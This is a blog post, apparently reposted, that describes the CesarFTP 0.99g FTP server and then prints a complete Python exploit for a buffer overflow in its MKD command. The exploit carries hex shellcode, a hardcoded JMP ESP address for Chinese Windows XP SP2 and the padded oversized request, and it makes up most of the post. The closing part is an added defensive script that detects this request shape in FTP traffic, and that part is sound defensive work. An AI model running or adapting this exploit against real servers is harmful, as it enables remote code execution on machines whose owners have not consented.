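CesarFtp 0.99g Exploit for Chinese-Language Systems
Source: MIAO'BLOG
CesarFTP is an excellent free FTP server package; although it is very small, it is fully featured. Installation is simple: unlike other FTP server software (such as Serv-U FTP, introduced earlier), it needs no complex system configuration before use, and the FTP server can start normally as soon as installation finishes, which makes it particularly suitable for ordinary users.
The latest version of CesarFTP at present is the Chinese-localized CesarFTP V0.99g.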
-----code-----
#!/usr/bin/python
#CesarFtp 0.99g Exploit
#Proof of Concept: execute calc.exe
#Tested on XP sp2 cn
#Bug found by h07 [h07@interia.pl]
#rewrite by friddy
#Date: 9.23.2008
from socket import *
shellcode = (  # Windows calc.exe payload
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbe"
"\x48\x93\xa9\x83\xeb\xfc\xe2\xf4\x42\xa0\xd7\xa9\xbe\x48\x18\xec"
"\x82\xc3\xef\xac\xc6\x49\x7c\x22\xf1\x50\x18\xf6\x9e\x49\x78\xe0"
"\x35\x7c\x18\xa8\x50\x79\x53\x30\x12\xcc\x53\xdd\xb9\x89\x59\xa4"
"\xbf\x8a\x78\x5d\x85\x1c\xb7\xad\xcb\xad\x18\xf6\x9a\x49\x78\xcf"
"\x35\x44\xd8\x22\xe1\x54\x92\x42\x35\x54\x18\xa8\x55\xc1\xcf\x8d"
"\xba\x8b\xa2\x69\xda\xc3\xd3\x99\x3b\x88\xeb\xa5\x35\x08\x9f\x22"
"\xce\x54\x3e\x22\xd6\x40\x78\xa0\x35\xc8\x23\xa9\xbe\x48\x18\xc1"
"\x82\x17\xa2\x5f\xde\x1e\x1a\x51\x3d\x88\xe8\xf9\xd6\xb8\x19\xad"
"\xe1\x20\x0b\x57\x34\x46\xc4\x56\x59\x2b\xf2\xc5\xdd\x66\xf6\xd1"
"\xdb\x48\x93\xa9")
host = "127.0.0.1"
port = 21
user = "friddy"
password = "friddy"
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
# Log in with an existing FTP account
s.send("user %s\r\n" % (user))
print s.recv(1024)
s.send("pass %s\r\n" % (password))
print s.recv(1024)
# Build the oversized MKD argument
buffer = "MKD "
buffer += "\n" * 671
buffer += "A" * 3 + "\x12\x45\xfa\x7f"  # JMP ESP
buffer += "\x90" * 40 + shellcode  # NOP padding followed by the payload
buffer += "\r\n"
print "len: %d" % (len(buffer))
s.send(buffer)
print s.recv(1024)
s.close()
#EoF
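
A defender-side check for the request shape used above, as an added example (Python 3, not part of the original post): it splits a captured FTP control stream on CRLF and flags commands that are over-long, contain bare LF characters, or carry non-printable bytes. `MAX_CMD_LEN`, the function names and the sample stream are assumptions constructed for illustration.

```python
import re

MAX_CMD_LEN = 512   # assumed policy limit; tune to the longest path the server should accept
VERB_RE = re.compile(rb"^[A-Za-z]{3,4}$")

def split_commands(stream):
    """Split a client-to-server FTP control stream on CRLF only (the RFC 959 line ending)."""
    parts = stream.split(b"\r\n")
    return parts[:-1] if parts[-1] == b"" else parts   # drop the empty piece after a final CRLF

def inspect_command(raw):
    """Return the reasons one FTP command looks like an overflow attempt (empty list if none)."""
    verb, _, arg = raw.partition(b" ")
    reasons = []
    if not VERB_RE.match(verb):
        reasons.append("malformed verb")
    if len(raw) > MAX_CMD_LEN:
        reasons.append("length %d > %d" % (len(raw), MAX_CMD_LEN))
    bare_lf = arg.count(b"\n")
    if bare_lf:
        reasons.append("%d bare LF in argument" % bare_lf)
    if any((b < 0x20 and b != 0x0A) or b >= 0x7F for b in arg):
        reasons.append("non-printable bytes in argument")
    return reasons

def scan(stream):
    """Return (verb, reasons) for every command in the stream that trips a check."""
    findings = []
    for raw in split_commands(stream):
        reasons = inspect_command(raw)
        if reasons:
            verb = raw.partition(b" ")[0].decode("ascii", "replace")
            findings.append((verb, reasons))
    return findings

# Constructed sample: a normal login and MKD, then an MKD shaped like the request above
# (671 LFs, a 4-byte non-ASCII value, 0x90 padding); inert filler stands in for the payload.
SAMPLE = (b"USER demo\r\nPASS demo\r\nMKD reports\r\n"
          b"MKD " + b"\n" * 671 + b"AAA" + b"\xde\xad\xbe\xef"
          + b"\x90" * 40 + b"B" * 160 + b"\r\n")

if __name__ == "__main__":
    for verb, reasons in scan(SAMPLE):
        print(verb, "->", "; ".join(reasons))
```

Servers that accept UTF-8 path names (RFC 2640) need the non-printable check narrowed to control bytes, otherwise legitimate international file names will be flagged.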